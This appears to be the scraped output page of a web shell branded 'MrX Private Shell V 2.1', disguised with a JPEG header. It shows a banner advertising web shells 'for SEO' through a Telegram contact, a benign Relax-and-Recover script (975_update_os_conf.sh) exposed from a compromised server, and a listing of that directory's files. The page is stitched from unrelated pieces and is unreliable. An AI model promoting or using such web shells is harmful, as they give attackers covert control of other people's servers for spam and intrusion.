����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# Add os/version info to os.conf in the rescue system
# so that we don't need to pull 'lsb_release' into the rescue system
# cf. the SetOSVendorAndVersion function in lib/config-functions.sh
# see pull #2142 https://github.com/rear/rear/pull/2142#issuecomment-506900480
# add OS_MASTER_VENDOR to os.conf
local rescue_system_os_conf_file="$ROOTFS_DIR/etc/rear/os.conf"
echo "# The following information was added automatically by the $WORKFLOW workflow:" >> $rescue_system_os_conf_file
for var in ARCH OS OS_VERSION OS_VENDOR OS_VENDOR_VERSION OS_VENDOR_ARCH OS_MASTER_VENDOR OS_MASTER_VENDOR_ARCH OS_MASTER_VENDOR_VERSION ; do
echo "$var='${!var}'"
done >> $rescue_system_os_conf_file
echo "# End of what was added automatically by the $WORKFLOW workflow." >> $rescue_system_os_conf_file
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 490_fix_broken_links.sh | File | 5.81 KB | 0644 |
|
| 500_ssh_setup.sh | File | 8.36 KB | 0644 |
|
| 501_check_ssh_keys.sh | File | 6.18 KB | 0644 |
|
| 502_include_mdadm_conf.sh | File | 345 B | 0644 |
|
| 503_store_tty_root_password.sh | File | 286 B | 0644 |
|
| 950_check_missing_programs.sh | File | 1.93 KB | 0644 |
|
| 960_remove_encryption_keys.sh | File | 3.22 KB | 0644 |
|
| 970_add_rear_release.sh | File | 134 B | 0644 |
|
| 975_update_os_conf.sh | File | 794 B | 0644 |
|
| 990_verify_rootfs.sh | File | 20.79 KB | 0644 |
|
| 995_md5sums_rootfs.sh | File | 3.34 KB | 0644 |
|